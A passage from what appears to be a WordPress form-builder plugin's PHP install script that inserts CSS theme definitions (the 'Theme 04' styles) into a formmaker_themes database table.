#fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #424242 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6CE9D;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/01/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\n	padding: 13px;\r\n	text-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 10px;\r\n	height: 10px;\r\n	background: #DAA157;\r\n	background: -moz-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -webkit-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -o-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -ms-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: linear-gradient(to bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	box-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\n	border-radius: 7px;\r\n	top: 1px;\r\n	left: 1px;\r\n	border: 1px solid #C0A77E;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #E2B983;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #AA824E;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #AA824E;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #E2B983;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #AA824E;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 04 light blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #CEE4E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	